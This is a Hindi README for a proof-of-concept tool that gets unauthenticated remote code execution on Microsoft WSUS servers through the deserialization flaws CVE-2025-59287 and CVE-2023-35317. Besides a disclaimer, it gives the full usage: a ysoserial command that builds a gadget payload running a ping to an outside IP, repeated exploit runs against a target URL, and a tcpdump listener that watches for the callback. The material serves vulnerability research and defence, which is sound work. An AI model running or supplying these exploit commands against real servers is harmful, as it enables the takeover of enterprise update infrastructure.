
Microsoft Windows Server Update Service (WSUS) में प्रमाणीकरण रहित RCE PoC - CVE-2025-59287 और CVE-2023-35317
CVE-2025-59287 के अंतर्गत: WSUS में SoapFormatter RCE: https://shellcode.blog/wsus-cve-2025-59287-investigation/
यह सॉफ़्टवेयर पूरी तरह से अकादमिक अनुसंधान और प्रभावी बचाव तकनीकों के विकास के उद्देश्यों के लिए बनाया गया है, तथा इसका उपयोग सिस्टम पर हमला करने के लिए नहीं किया जाना चाहिए, जब तक कि स्पष्ट रूप से अधिकृत न किया गया हो। परियोजना के अनुरक्षक सॉफ़्टवेयर के दुरुपयोग के लिए ज़िम्मेदार या उत्तरदायी नहीं हैं। जिम्मेदारी से उपयोग करें।
आवश्यक फ़्लैग्स:
--target-url – लक्ष्य WSUS सर्वर का बेस URL, उदा. http://WIN-246JC0TE3BB.vuln.local:8530--cve – CVE-2023-35317 या CVE-2025-59287 में से एकवैकल्पिक फ़्लैग्स:
--dns-name – SOAP अनुरोधों में उपयोग किया जाने वाला क्लाइंट DNS नाम (डिफ़ॉल्ट: bugcrowd.local)--random – --dns-name के आगे एक यादृच्छिक उपडोमेन जोड़ता है ताकि प्रत्येक रन एक नए क्लाइंट के रूप में दिखे--payload – कस्टम बेस64-एन्कोडेड ysoserial पेलोड; यदि छोड़ दिया जाता है, तो चयनित --cve के लिए एक अंतर्निहित पेलोड का उपयोग किया जाता है--debug – विस्तृत डीबग लॉगिंग सक्षम करें ([DEBUG] पंक्तियाँ)python3 checker.py --target-url http://WIN-246JC0TE3BB.vuln.local:8530 --payload BASE64_YSOSERIAL_BLOB --dns-name bugcrowd.local --cve CVE-2025-59287 --randompython3 checker.py --target-url http://WIN-246JC0TE3BB.vuln.local:8530 --dns-name bugcrowd.local --cve CVE-2023-35317 --random./ysoserial.exe -g RolePrincipal -f BinaryFormatter -c 'ping 18.118.100.100' -o base64 (या --cve CVE-2023-35317 के लिए अंतर्निहित पेलोड पर भरोसा करें)for i in `seq 1 300`; do sleep 1; python3 checker.py --target-url http://WIN-246JC0TE3BB.vuln.local:8530 --payload BASE64_YSOSERIAL_BLOB --dns-name bugcrowd.local --cve CVE-2023-35317 --random ;donesudo tcpdump -l -n -i any icmp | while read line; do echo "$line"; echo -ne '\a'; done